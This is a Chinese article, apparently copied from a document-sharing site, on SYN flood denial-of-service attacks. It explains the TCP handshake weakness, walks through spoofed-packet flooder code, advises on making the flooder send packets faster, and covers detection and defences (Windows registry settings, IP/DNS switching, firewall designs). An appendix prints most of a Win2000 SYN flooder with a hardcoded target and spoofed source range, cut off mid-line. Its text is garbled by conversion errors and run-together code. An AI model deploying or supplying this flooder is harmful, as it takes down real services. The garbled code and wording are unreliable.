SYNFlood攻击的基本原理及防御_第1页
SYNFlood攻击的基本原理及防御_第2页
SYNFlood攻击的基本原理及防御_第3页
SYNFlood攻击的基本原理及防御_第4页
SYNFlood攻击的基本原理及防御_第5页
已阅读5页,还剩6页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

SYNFlood攻击的基本原理及防御

文章来源:HYPERLINK"http://shotgun.patching。net/syn。htm"\t"_blank"http://shotgun。patching.net/syn。htmﻫﻫ第一部分SYNFlood的基本原理

ﻫﻫﻫSYNFlood是当前最流行的DoS(拒绝服务攻击)与DDoS(分布式拒绝服务攻击)的方式之一,这是一种利用TCP协议缺陷,发送大量伪造的TCP连接恳求,从而使得被攻击方资源耗尽(CPU满负荷或内存不足)的攻击方式。ﻫﻫ要明白这种攻击的基本原理,还是要从TCP连接建立的过程开头说起:

ﻫ大家都知道,TCP与UDP不同,它是基于连接的,也就是说:为了在服务端和客户端之间传送TCP数据,必须先建立一个虚拟电路,也就是TCP连接,建立TCP连接的标准过程是这样的:

ﻫ首先,恳求端(客户端)发送一个包含SYN标志的TCP报文,SYN即同步(Synchronize),同步报文会指明客户端使用的端口以及TCP连接的初始序号;

ﻫﻫ其次步,服务器在收到客户端的SYN报文后,将返回一个SYN+ACK的报文,表示客户端的恳求被接受,同时TCP序号被加一,ACK即确认(Acknowledgement)。

ﻫﻫ第三步,客户端也返回一个确认报文ACK给服务器端,同样TCP序列号被加一,到此一个TCP连接完成。

以上的连接过程在TCP协议中被称为三次握手(Three-wayHandshake)。

ﻫﻫ问题就出在TCP连接的三次握手中,假设一个用户向服务器发送了SYN报文后突然死机或掉线,那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的(第三次握手无法完成),这种情况下服务器端一般会重试(再次发送SYN+ACK给客户端)并等待一段时间后丢弃这个未完成的连接,这段时间的长度我们称为SYNTimeout,一般来说这个时间是分钟的数量级(大约为30秒-2分钟);一个用户消灭特别导致服务器的一个线程等待1分钟并不是什么很大的问题,但如果有一个恶意的攻击者大量模拟这种情况,服务器端将为了维护一个格外大的半连接列表而消耗格外多的资源--——数以万计的半连接,即使是简洁的保存并遍历也会消耗格外多的CPU时间和内存,何况还要不断对这个列表中的IP进行SYN+ACK的重试。实际上如果服务器的TCP/IP栈不够强大,最后的结果往往是堆栈溢出崩溃---即使服务器端的系统足够强大,服务器端也将忙于处理攻击者伪造的TCP连接恳求而无暇理睬客户的正常恳求(毕竟客户端的正常恳求比率格外之小),此时从正常客户的角度看来,服务器失去响应,这种情况我们称作:服务器端受到了SYNFlood攻击(SYN洪水攻击)。

ﻫﻫ从防御角度来说,有几种简洁的解决方法,第一种是缩短SYNTimeout时间,由于SYNFlood攻击的效果取决于服务器上保持的SYN半连接数,这个值=SYN攻击的频度x

SYNTimeout,所以通过缩短从接收到SYN报文到确定这个报文无效并丢弃改连接的时间,例如设置为20秒以下(过低的SYNTimeout设置可能会影响客户的正常访问),可以成倍的降低服务器的负荷。ﻫﻫ

其次种方法是设置SYNCookie,就是给每一个恳求连接的IP地址安排一个Cookie,如果短时间内连续受到某个IP的重复SYN报文,就认定是受到了攻击,以后从这个IP地址来的包会被一概丢弃.

可是上述的两种方法只能应付比较原始的SYNFlood攻击,缩短SYNTimeout时间仅在对方攻击频度不高的情况下生效,SYNCookie更依靠于对方使用真实的IP地址,如果攻击者以数万/秒的速度发送SYN报文,同时利用SOCK_RAW随机改写IP报文中的源地址,以上的方法将毫无用武之地。ﻫﻫ

ﻫﻫ

ﻫﻫ

ﻫﻫ

ﻫﻫ

ﻫﻫ

其次部份SYNFlooder源码解读

下面我们来分析SYNFlooder的程序实现。ﻫﻫ首先,我们来看一下TCP报文的格式:ﻫﻫ

ﻫ0

1

3

5

6ﻫ

024680246802468024680246802468024ﻫﻫ

+—+—+—+-+-+-+-+—+—+—+—+-+-+-+—+—+-+—+-+—+-+-+—+-+-+-+-+—+-+-+-+—+ﻫ

|

IP首部

TCP首部

TCP数据段

|ﻫﻫ+-+-+-+-+-+—+—+—+-+-+-+-+—+—+—+-+-+-+-+—+-+—+-+-+-+-+-+—+—+-+-+—+

图一TCP报文结构

ﻫﻫ

ﻫﻫ如上图所示,一个TCP报文由三个部分构成:20字节的IP首部、20字节的TCP首部与不定长的数据段,(实际操作时可能会有可选的IP选项,这种情况下TCP首部向后顺延)由于我们只是发送一个SYN信号,并不传递任何数据,所以TCP数据段为空.TCP首部的数据结构为:

ﻫﻫ

0

2

3

ﻫﻫ

012345678901234567890123456789012ﻫﻫ

+—+—+—+-+-+-+-+-+-+—+—+—+-+-+—+-+—+-+—+-+—+-+-+-+-+—+—+-+—+—+—+-+ﻫﻫ

十六位源端口号

十六位目标端口号

|

+—+—+-+-+-+—+—+-+—+-+-+-+-+—+-+-+—+-+—+-+—+-+-+-+-+—+-+-+—+-+-+-+ﻫﻫ

|

三十二位序列号

|ﻫﻫ

+—+-+-+-+-+—+—+—+-+-+-+—+-+-+—+—+—+-+-+-+-+—+-+-+-+-+-+—+—+-+-+-+ﻫﻫ

三十二位确认号

|

+—+—+-+-+-+-+-+—+-+-+-+-+-+-+-+-+-+—+—+—+—+—+-+-+—+—+-+-+-+-+-+—+ﻫﻫ

|四位

|U|A|P|R|S|F|

|ﻫﻫ

|首部

|六位保留位|R|C|S|S|Y|I|

十六位窗口大小

|长度

|G|K|H|T|N|N|

|ﻫﻫ

+-+-+-+-+-+—+-+-+-+—+—+-+-+-+-+-+-+—+-+—+-+—+—+-+—+-+-+-+-+-+-+—+ﻫﻫ

十六位校验和

十六位紧急指针

|ﻫﻫ

+-+-+-+-+-+-+-+—+-+-+-+-+-+-+—+-+-+-+—+-+-+—+-+-+—+-+-+—+-+-+—+-+

选项(若有)

|ﻫﻫ

+—+—+—+—+-+-+—+-+-+—+-+—+-+—+-+—+-+-+-+-+-+-+-+—+-+—+—+—+-+-+-+-+ﻫﻫ

|

数据(若有)

|ﻫﻫ

+—+—+-+-+-+-+—+-+—+-+-+-+-+-+—+-+-+-+-+-+-+—+—+—+-+-+—+-+-+—+-+-+ﻫﻫ

图二

TCP首部结构

ﻫﻫ

ﻫﻫ依据TCP报文格式,我们定义一个结构TCP_HEADER用来存放TCP首部:ﻫﻫtypedefstruct_tcphdr

ﻫﻫ{ﻫﻫ

USHORTth_sport;

//16位源端口ﻫﻫ

USHORTth_dport;

//16位目的端口ﻫﻫ

unsignedintth_seq;

//32位序列号ﻫﻫ

unsignedintth_ack;

//32位确认号

unsignedcharth_lenres;

//4位首部长度+6位保留字中的4位ﻫﻫ

unsignedcharth_flag;

//2位保留字+6位标志位ﻫﻫ

USHORTth_win;

//16位窗口大小ﻫ

USHORTth_sum;

//16位校验和ﻫﻫ

USHORTth_urp;

//16位紧急数据偏移量

ﻫ}TCP_HEADER;

ﻫ通过以正确的数据填充这个结构并将TCP_HEADER.th_flag赋值为2(二进制的00000010)我们能制造一个SYN的TCP报文,通过大量发送这个报文可以实现SYNFlood的效果.但是为了进行IP哄骗从而隐藏自己,也为了躲避服务器的SYNCookie检查,还需要直接对IP首部进行操作:ﻫ

1

012345678901234567890123456789012

+-+-+-+-+-+-+-+-+-+-+-+—+—+-+—+—+-+—+-+-+-+-+-+-+—+-+—+-+-+-+-+—+ﻫﻫ

|版本

|长度

|八位服务类型

|

十六位总长度

+-+-+-+-+—+-+-+—+-+—+-+—+-+—+-+-+-+-+-+-+-+—+—+-+-+—+-+-+-+-+—+-+ﻫﻫ

十六位标识

|标志|

十三位片偏移

|

+-+—+—+-+-+-+—+-+-+-+-+—+—+—+-+—+-+—+-+-+—+—+—+—+-+-+—+—+-+-+—+-+ﻫﻫ

|八位生存时间

|

八位协议

十六位首部校验和

+-+-+-+-+-+-+-+-+-+-+-+-+-+—+-+-+-+-+—+-+—+—+—+—+—+-+-+-+-+—+-+-+

|

三十二位源IP地址

|ﻫﻫ

+—+-+—+-+-+-+-+-+-+-+-+-+-+-+-+—+-+—+—+-+-+-+—+—+—+—+-+-+-+—+-+—+ﻫﻫ

三十二位目的IP地址

|ﻫﻫ

+-+-+-+-+-+—+—+—+—+-+-+-+-+—+-+-+-+—+—+—+—+-+-+-+—+—+—+—+-+-+—+-+

|

选项(若有)

|ﻫﻫ

+—+—+—+—+—+—+-+—+—+—+—+—+-+-+-+-+-+-+—+-+—+-+—+-+-+-+-+—+-+—+—+-+ﻫﻫ

|

数据

+-+-+-+-+—+—+-+-+-+-+-+-+-+—+-+-+-+-+—+-+-+-+-+—+—+-+-+—+-+—+-+—+ﻫ

图三

IP首部结构ﻫﻫ同样定义一个IP_HEADER来存放IP首部

ﻫtypedefstruct_iphdrﻫﻫ{ﻫﻫ

unsignedcharh_verlen;

//4位首部长度+4位IP版本号ﻫﻫ

unsignedchartos;

//8位服务类型TOSﻫﻫ

unsignedshorttotal_len;

//16位总长度(字节)ﻫﻫ

unsignedshortident;

//16位标识

unsignedshortfrag_and_flags;

//3位标志位ﻫ

unsignedchar

ttl;

//8位生存时间TTLﻫ

unsignedcharproto;

//8位协议号(TCP,UDP或其他)ﻫﻫ

unsignedshortchecksum;

//16位IP首部校验和ﻫﻫ

unsignedintsourceIP;

//32位源IP地址ﻫﻫ

unsignedintdestIP;

//32位目的IP地址

ﻫ}IP_HEADER;ﻫﻫ然后通过SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED));ﻫﻫ

建立一个原始套接口,由于我们的IP源地址是伪造的,所以不能指望系统帮我们计算IP校验和,我们得在在setsockopt中设置IP_HDRINCL告知系统自己填充IP首部并自己计算校验和:ﻫﻫ

flag=TRUE;ﻫ

setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char*)&flag,sizeof(int));

ﻫIP校验和的计算方法是:首先将IP首部的校验和字段设为0(IP_HEADER.checksum=0),然后计算整个IP首部(包括选项)的二进制反码的和,一个标准的校验和函数如下所示:ﻫﻫUSHORTchecksum(USHORT*buffer,intsize)ﻫﻫ{

ﻫﻫunsignedlongcksum=0;ﻫﻫ

while(size>1){

cksum+=*buffer++;ﻫﻫ

size-=sizeof(USHORT);ﻫﻫ

}ﻫﻫ

if(size)cksum+=*(UCHAR*)buffer;ﻫﻫ

cksum=(cksum>>16)+(cksum&0xffff);ﻫﻫ

cksum+=(cksum〉>16);ﻫﻫ

return(USHORT)(~cksum);ﻫ

}ﻫﻫ这个函数并没有经过任何的优化,由于校验和函数是TCP/IP协议中被调用最多函数之一,所以一般说来,在实现TCP/IP栈时,会依据操作系统对校验和函数进行优化。

TCP首部检验和与IP首部校验和的计算方法相同,在程序中使用同一个函数来计算。ﻫﻫ需要注意的是,由于TCP首部中不包含源地址与目标地址等信息,为了保证TCP校验的有效性,在进行TCP校验和的计算时,需要增加一个TCP伪首部的校验和,定义如下:ﻫﻫstruct

ﻫﻫ{ﻫ

unsignedlongsaddr;

//源地址ﻫﻫ

unsignedlongdaddr;

//目的地址

charmbz;

//置空ﻫﻫ

charptcl;

//协议类型ﻫﻫ

unsignedshorttcpl;

//TCP长度ﻫﻫ}psd_header;ﻫﻫ然后我们将这两个字段复制到同一个缓冲区SendBuf中并计算TCP校验和:

ﻫmemcpy(SendBuf,&psd_header,sizeof(psd_header));

memcpy(SendBuf+sizeof(psd_header),&tcp_header,sizeof(tcp_header));ﻫﻫ

tcp_header.th_sum=checksum((USHORT*)SendBuf,sizeof(psd_header)+sizeof(tcp_header));ﻫﻫ计算IP校验和的时候不需要包括TCP伪首部:

memcpy(SendBuf,&ip_header,sizeof(ip_header));ﻫﻫ

memcpy(SendBuf+sizeof(ip_header),&tcp_header,sizeof(tcp_header));

ip_header。checksum=checksum((USHORT*)SendBuf,sizeof(ip_header)+sizeof(tcp_header));ﻫ

再将计算过校验和的IP首部与TCP首部复制到同一个缓冲区中就可以直接发送了:ﻫﻫ

memcpy(SendBuf,&ip_header,sizeof(ip_header));

sendto(SockRaw,SendBuf,datasize,0,(structsockaddr*)&DestAddr,sizeof(DestAddr));

ﻫﻫ由于整个TCP报文中的全部部分都是我们自己写入的(操作系统不会做任何干涉),所以我们可以在IP首部中放置随机的源IP地址,如果伪造的源IP地址确实有人使用,他在接收到服务器的SYN+ACK报文后会发送一个RST报文(标志位为00000100),通知服务器端不需要等待一个无效的连接,可是如果这个伪造IP并没有绑定在任何的主机上,不会有任何设备去通知主机该连接是无效的(这正是TCP协议的缺陷),主机将不断重试直到SYNTimeout时间后才能丢弃这个无效的半连接。所以当攻击者使用主机分布很稀疏的IP地址段进行伪装IP的SYNFlood攻击时,服务器主机承受的负荷会相当的高,依据测试,一台PIII550MHz+128MB+100Mbps的机器使用经过初步优化的SYNFlooder程序可以以16,000包/秒的速度发送TCPSYN报文,这样的攻击力已经足以拖垮大部分WEB服务器了。

略微动动脑筋我们就会发现,想对SYNFlooder程序进行优化是很简洁的,从程序构架来看,攻击时循环内的代码主要是进行校验和计算与缓冲区的填充,一般的思路是提高校验和计算的速度,我甚至见过用汇编代码编写的校验和函数,实际上,有另外一个变通的方法可以轻松实现优化而又不需要高深的编程技巧和数学知识,(狡猾说吧,我数学比较差:P),我们仔细讨论了两个不同源地址的TCPSYN报文后发现,两个报文的大部分字段相同(比如目的地址、协议等等),只有源地址和校验和不同(如果为了隐蔽,源端口也可以有变化,但是并不影响我们算法优化的思路),如果我们事先计算好大量的源地址与校验和的对应关系表(如果其他的字段有变化也可以加入这个表),等计算完毕了攻击程序就只需要单纯的组合缓冲区并发送(用指针来直接操作缓冲区的特定位置,从事先计算好的对应关系表中读出数据,替换缓冲区相应字段),这种简洁的工作完全取决于系统发送IP包的速度,与程序的效率没有任何关系,这样,即使是CPU主频较低的主机也能快速的发送大量TCPSYN攻击包。如果考虑到缓冲区拼接的时间,甚至可以定义一个很大的缓冲区数组,填充完毕后再发送(雏鹰给这种方法想了一个很贴切的比方:火箭炮装弹虽然很慢,但是一旦炮弹上膛了以后就可以连续猛烈地放射了:).

ﻫﻫ

ﻫﻫ

ﻫﻫ第三部分SYNFlood攻击的监测与防御初探ﻫﻫ

对于SYNFlood攻击,目前尚没有很好的监测和防御方法,不过如果系统管理员熟识攻击方法和系统架构,通过一系列的设定,也能从肯定程度上降低被攻击系统的负荷,减轻负面的影响。(这正是我撰写本文的主要目的)ﻫﻫ

一般来说,如果一个系统(或主机)负荷突然上升甚至失去响应,使用Netstat命令能看到大量SYN_RCVD的半连接(数量>500或占总连接数的10%以上),可以认定,这个系统(或主机)遭到了SYNFlood攻击.ﻫﻫ

遭到SYNFlood攻击后,首先要做的是取证,通过Netstat–n–ptcp〉resault。txt记录目前全部TCP连接状态是必要的,如果有嗅探器,或者TcpDump之类的工具,记录TCPSYN报文的全部细节也有助于以后追查和防御,需要记录的字段有:源地址、IP首部中的标识、TCP首部中的序列号、TTL值等,这些信息虽然很可能是攻击者伪造的,但是用来分析攻击者的心理状态和攻击程序也不无帮助。格外是TTL值,如果大量的攻击包似乎来自不同的IP但是TTL值却相同,我们往往能推断出攻击者与我们之间的路由器距离,至少也可以通过过滤特定TTL值的报文降低被攻击系统的负荷(在这种情况下TTL值与攻击报文不同的用户就可以恢复正常访问)

前面曾经提到可以通过缩短SYNTimeout时间和设置SYNCookie来进行SYN攻击保护,对于Win2000系统,还可以通过修改注册表降低SYNFlood的危害,在注册表中作如下改动:ﻫﻫ首先,打开regedit,找到HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters

ﻫﻫ增加一个SynAttackProtect的键值,类型为REG_DWORD,取值范围是0-2,这个值决定了系统受到SYN攻击时实行的保护措施,包括削减系统SYN+ACK的重试的次数等,默认值是0(没有任何保护措施),推举设置是2;

ﻫﻫ增加一个TcpMaxHalfOpen的键值,类型为REG_DWORD,取值范围是100-0xFFFF,这个值是系统允许同时打开的半连接,默认情况下WIN2KPRO和SERVER是100,ADVANCEDSERVER是500,这个值很难确定,取决于服务器TCP负荷的状况和可能受到的攻击强度,简略的值需要经过试验才能决定.

增加一个TcpMaxHalfOpenRetried的键值,类型为REG_DWORD,取值范围是80—0xFFFF,默认情况下WIN2KPRO和SERVER是80,ADVANCEDSERVER是400,这个值决定了在什么情况下系统会打开SYN攻击保护.

ﻫﻫ

我们来分析一下Win2000的SYN攻击保护机制:正常情况下,Win2K对TCP连接的三次握手有一个常规的设置,包括SYNTimeout时间、SYN—ACK的重试次数和SYN报文从路由器到系统再到Winsock的延时等,这个常规设置是针对系统性能进行优化的(平安和性能往往相互冲突)所以可以给用户供应便利快捷的服务;一旦服务器受到攻击,SYN半连接的数量超过TcpMaxHalfOpenRetried的设置,系统会认为自己受到了SYNFlood攻击,此时设置在SynAttackProtect键值中的选项开头作用,SYNTimeout时间被减短,SYN-ACK的重试次数削减,系统也会自动对缓冲区中的报文进行延时,避开对TCP/IP堆栈造成过大的冲击,力图将攻击危害减到最低;如果攻击强度不断增大,超过了TcpMaxHalfOpen值,此时系统已经不能供应正常的服务了,更重要的是保证系统不会崩溃,所以系统将会丢弃任何超出TcpMaxHalfOpen值范围的SYN报文(应该是使用随机丢包策略),保证系统的稳定性.

ﻫﻫ

所以,对于需要进行SYN攻击保护的系统,我们可以测试/猜测一下访问峰值时期的半连接打开量,以其作为参考设定TcpMaxHalfOpenRetried的值(保留肯定的余量),然后再以TcpMaxHalfOpenRetried的1。25倍作为TcpMaxHalfOpen值,这样可以最大限度地发挥WIN2K自身的SYN攻击保护机制。

ﻫﻫ

通过设置注册表防御SYNFlood攻击,采纳的是“挨打”的策略,无论系统如何强大,始终不能光靠挨打支撑下去,除了挨打之外,“退让”也是一种比较有效的方法。

ﻫﻫ

退让策略是基于SYNFlood攻击代码的一个缺陷,我们重新来分析一下SYNFlood攻击者的流程:SYNFlood程序有两种攻击方式,基于IP的和基于域名的,前者是攻击者自己进行域名解析并将IP地址传递给攻击程序,后者是攻击程序自动进行域名解析,但是它们有一点是相同的,就是一旦攻击开头,将不会再进行域名解析,我们的切入点正是这里:假设一台服务器在受到SYNFlood攻击后飞快更换自己的IP地址,那么攻击者仍在不断攻击的只是一个空的IP地址,并没有任何主机,而防御方只要将DNS解析更改到新的IP地址就能在很短的时间内(取决于DNS的刷新时间)恢复用户通过域名进行的正常访问。为了迷惑攻击者,我们甚至可以放置一台“牺牲"服务器让攻击者满意于攻击的“效果”(由于DNS缓冲的缘由,只要攻击者的扫瞄器不重起,他访问的仍然是原先的IP地址)。

ﻫﻫ

同样的缘由,在众多的负载均衡架构中,基于DNS解析的负载均衡本身就拥有对SYNFlood的免疫力,基于DNS解析的负载均衡能将用户的恳求安排到不同IP的服务器主机上,攻击者攻击的永久只是其中一台服务器,虽然说攻击者也能不断去进行DNS恳求从而打破这种“退让”策略,但是一来这样增加了攻击者的成本,二来过多的DNS恳求可以帮助我们追查攻击者的真正踪迹(DNS恳求不同于SYN攻击,是需要返回数据的,所以很难进行IP伪装)。

ﻫﻫ

ﻫﻫ

对于防火墙来说,防御SYNFlood攻击的方法取决于防火墙工作的基本原理,一般说来,防火墙可以工作在TCP层之上或IP层之下,工作在TCP层之上的防火墙称为网关型防火墙,网关型防火墙与服务器、客户机之间的关系如下图所示:

ﻫﻫ

ﻫﻫ外部TCP连接

内部TCP连接

ﻫﻫ

[客户机]=================>[防火墙]=================〉[服务器]

ﻫﻫ

如上图所示,客户机与服务器之间并没有真正的TCP连接,客户机与服务器之间的全部数据交换都是通过防火墙代理的,外部的DNS解析也同样指向防火墙,所以如果网站被攻击,真正受到攻击的是防火墙,这种防火墙的优点是稳定性好,抗打击能力强,但是由于全部的TCP报文都需要经过防火墙转发,所以效率比较低由于客户机并不直接与服务器建立连接,在TCP连接没有完成时防火墙不会去向后台的服务器建立新的TCP连接,所以攻击者无法越过防火墙直接攻击后台服务器,只要防火墙本身做的足够强壮,这种架构可以抵抗相当强度的SYNFlood攻击。但是由于防火墙实际建立的TCP连接数为用户连接数的两倍(防火墙两端都需要建立TCP连接),同时又代理了全部的来自客户端的TCP恳求和数据传送,在系统访问量较大时,防火墙自身的负荷会比较高,所以这种架构并不能适用于大型网站.(我感觉,对于这样的防火墙架构,使用TCP_STATE攻击估量会相当有效:)

ﻫﻫ

工作在IP层或IP层之下的防火墙(路由型防火墙)工作原理有所不同,它与服务器、客户机的关系如下图所示:

[防火墙]数据包修改转发

ﻫﻫ

[客户机]========|=======================〉[服务器]

ﻫﻫTCP连接

ﻫﻫ

ﻫﻫ

客户机直接与服务器进行TCP连接,防火墙起的是路由器的作用,它截获全部通过的包并进行过滤,通过过滤的包被转发给服务器,外部的DNS解析也直接指向服务器,这种防火墙的优点是效率高,可以适应100Mbps-1Gbps的流量,但是这种防火墙如果配置不当,不仅可以让攻击者越过防火墙直接攻击内部服务器,甚至有可能放大攻击的强度,导致整个系统崩溃。

在这两种基本模型之外,有一种新的防火墙模型,我个人认为还是比较奇妙的,它集中了两种防火墙的优势,这种防火墙的工作原理如下所示:

第一阶段,客户机恳求与防火墙建立连接:

ﻫﻫSYN

SYN+ACK

ACK

ﻫﻫ

[客户机]—---〉[防火墙]

=〉

[防火墙]-—-—-—-->[客户机]

=〉

[客户机]-——>[防火墙]

ﻫﻫ

其次阶段,防火墙伪装成客户机与后台的服务器建立连接

[防火墙]<===========〉[服务器]

TCP连接

ﻫﻫ

第三阶段,之后全部从客户机来的TCP报文防火墙都直接转发给后台的服务器

ﻫ防火墙转发

ﻫ[客户机]<======|=======>[服务器]

TCP连接

ﻫﻫ

这种结构吸取了上两种防火墙的优点,既能完全掌握全部的SYN报文,又不需要对全部的TCP数据报文进行代理,是一种两全其美的方法。

ﻫﻫ近来,国外和国内的一些防火墙厂商开头讨论带宽掌握技术,如果能真正做到严格掌握、安排带宽,就能很大程度上防御绝大多数的拒绝服务攻击,我们还是拭目以待吧.

ﻫﻫ

ﻫﻫ附录:Win2000下的SYNFlood程序

ﻫ改编自Linux下Zakath编写的SYNFlooder

ﻫ编译环境:VC++6.0,编译时需要包含ws2_32.libﻫ

//////////////////////////////////////////////////////////////////////////

ﻫ//

//ﻫ

//

SYNFlooderForWin2KbyShotgun

//ﻫﻫ//

//

ﻫ//

THISPROGRAMISMODIFIEDFROMALINUXVERSIONBYZakath

//

ﻫ//

THANXLionHookFORPROGRAMOPTIMIZATION

//ﻫﻫ//

//

ﻫ//

Released:

[2001。4]

//ﻫ

//

Author:

[Shotgun]

//

ﻫ//

Homepage:

//

ﻫ//

[HYPERLINK\t"_blank"http://IT.Xici.Net]

//ﻫ

//

[HYPERLINK\t”_blank"http://WWW.Patching.Net]

//ﻫﻫ//

//

ﻫ//////////////////////////////////////////////////////////////////////////ﻫ

#include<winsock2.h〉ﻫ

#include〈Ws2tcpip.h〉

#include<stdio.h〉ﻫ

#include<stdlib。h〉ﻫﻫ#defineSEQ0x28376839ﻫ

#defineSYN_DEST_IP”192.168.15。250”//被攻击的IPﻫﻫ#defineFAKE_IP"10.168.150.1"

//伪装IP的起始值,本程序的伪装IP掩盖一个B类网段ﻫﻫ#defineSTATUS_FAILED0xFFFF

//错误返回值

ﻫﻫtypedefstruct_iphdr

//定义IP首部ﻫ

{

unsignedcharh_verlen;

//4位首部长度,4位IP版本号ﻫ

unsignedchartos;

//8位服务类型TOSﻫﻫ

unsignedshorttotal_len;

//16位总长度(字节)ﻫﻫ

unsignedshortident;

//16位标识ﻫﻫ

unsignedshortfrag_and_flags;

//3位标志位ﻫﻫ

unsignedchar

ttl;

//8位生存时间TTLﻫﻫ

unsignedcharproto;

//8位协议(TCP,UDP或其他)ﻫﻫ

unsignedshortchecksum;

//16位IP首部校验和ﻫﻫ

unsignesourceIP;

//32位源IP地址

unsignedintdestIP;

//32位目的IP地址ﻫﻫ}IP_HEADER;ﻫ

ﻫﻫstruct

//定义TCP伪首部

ﻫ{ﻫﻫ

unsignedlongsaddr;

//源地址ﻫ

unsignedlongdaddr;

//目的地址ﻫ

charmbz;ﻫﻫ

charptcl;

//协议类型ﻫﻫ

unsignedshorttcpl;

//TCP长度ﻫﻫ}psd_header;ﻫ

ﻫﻫtypedefstruct_tcphdr

//定义TCP首部

ﻫ{ﻫﻫ

USHORTth_sport;

//16位源端口ﻫﻫ

USHORTth_dport;

//16位目的端口

unsignedintth_seq;

//32位序列号ﻫ

unsignedintth_ack;

//32位确认号ﻫﻫ

unsignedcharth_lenres;

//4位首部长度/6位保留字ﻫ

unsignedcharth_flag;

//6位标志位ﻫﻫ

USHORTth_win;

//16位窗口大小

USHORTth_sum;

//16位校验和

USHORTth_urp;

//16位紧急数据偏移量ﻫﻫ}TCP_HEADER;ﻫﻫ

ﻫﻫ//CheckSum:计算校验和的子函数ﻫﻫUSHORTchecksum(USHORT*buffer,intsize)

ﻫ{

ﻫﻫunsignedlongcksum=0;ﻫ

while(size〉1){ﻫ

cksum+=*buffer++;

size—=sizeof(USHORT);ﻫﻫ

}ﻫ

if(size){

cksum+=*(UCHAR*)buffer;ﻫﻫ

}

cksum=(cksum>>16)+(cksum&0xffff);

cksum+=(cksum>>16);ﻫﻫ

return(USHORT)(~cksum);

ﻫ}ﻫﻫ

ﻫ//

SynFlood主函数

ﻫintmain()ﻫﻫ{ﻫﻫ

intdatasize,ErrorCode,counter,flag,FakeIpNet,FakeIpHost;ﻫ

intTimeOut=2000,SendSEQ=0;ﻫﻫ

charSendBuf[128]={0};ﻫﻫ

charRecvBuf[65535]={0};

WSADATAwsaData;ﻫﻫ

SOCKETSockRaw=(SOCKET)NULL;

structsockaddr_inDestAddr;

IP_HEADERip_header;

TCP_HEADERtcp_header;

//初始化SOCK_RAWﻫﻫ

if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0){

fprintf(stderr,"WSAStartupfailed:%d\n”,ErrorCode);ﻫ

ExitProcess(STATUS_FAILED);ﻫﻫ

}ﻫ

SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED));ﻫﻫif(SockRaw==INVALID_SOCKET){ﻫﻫ

fprintf(stderr,"WSASocket()failed:%d\n",WSAGetLastError());ﻫﻫ

ExitProcess(STATUS_FAILED);ﻫﻫ

}ﻫﻫ

flag=TRUE;

//设置IP_HDRINCL以自己填充IP首部ﻫﻫ

ErrorCode=setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char*)&flag,sizeof(int));

ﻫIf(ErrorCode==SOCKET_ERROR)

printf("SetIP_HDRINCLError!\n");ﻫﻫ

__try{ﻫ

//设置发送超时ﻫﻫ

ErrorCode=setsockopt(SockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut));ﻫ

if(ErrorCode==SOCKET_ERROR){ﻫﻫ

fprintf(stderr,”FailedtosetsendTimeOut:%d\n”,WSAGetLastError());

__leave;ﻫﻫ

}ﻫﻫ

memset(&DestAddr,0,sizeof(DestAddr));ﻫ

DestAddr.sin_family=AF_INET;

DestAddr.sin_addr。s_addr=inet_addr(SYN_DEST_IP);ﻫﻫ

FakeIpNet=inet_addr(FAKE_IP);

FakeIpHost=ntohl(FakeIpNet);ﻫﻫ

//填充IP首部

ip_header。h_verlen=(4<<4|sizeof(ip_header)/sizeof(unsignedlong));ﻫﻫ//高四位IP版本号,低四位首部长度

ip_header.total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));

//16位总长度(字节)ﻫﻫ

ip_header。ident=1;

//16位标识ﻫﻫ

ip_header.frag_and_flags=0;

//3位标志位ﻫﻫ

ip_header.ttl=128;

//8位生存时间TTL

ip_header.proto=IPPROTO_TCP;

//8位协议(TCP,UDP…)ﻫﻫ

ip_header.checksum=0;

//16位IP首部校验和

ip_header.sourceIP=htonl(FakeIpHost+SendSEQ);

//32位源IP地址ﻫ

ip_header.destIP=inet_addr(SYN_DEST_IP);

//32位目的IP地址ﻫﻫ

//填充TCP首部ﻫ

tcp_header.th_sport=htons(7000);

//源端口号ﻫﻫ

tcp_header。th_dport=htons(8080);

//目的端口号

tcp_header.th_seq=htonl(SEQ+SendSEQ);

//SYN序列号ﻫ

tcp_header.th_ack=0;

//ACK序列号置为0

tcp_header.th_lenres=(sizeof(TCP_HEADER)/4<〈4|0);

//TCP长度和保留位ﻫﻫ

tcp_header.th_flag=2;

//SYN标志ﻫﻫ

tcp_header.th_win=htons(16384);

//窗口大小ﻫﻫ

tcp_header。th_urp=0;

//偏移ﻫ

tcp_header.th_sum=0;

//校验和ﻫﻫ

//填充TCP伪首部(用于计算校验和,并不真正发送)ﻫﻫ

psd_header.saddr=ip_header.sourceIP;

//源地址ﻫ

psd_header.daddr=ip_header.destIP;

//目的地址ﻫﻫ

psd_header。mbz=0;

psd_header.ptcl=IPPROTO_TCP;

//协议类型ﻫ

psd_header.tcpl=htons(sizeof(tcp_head

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论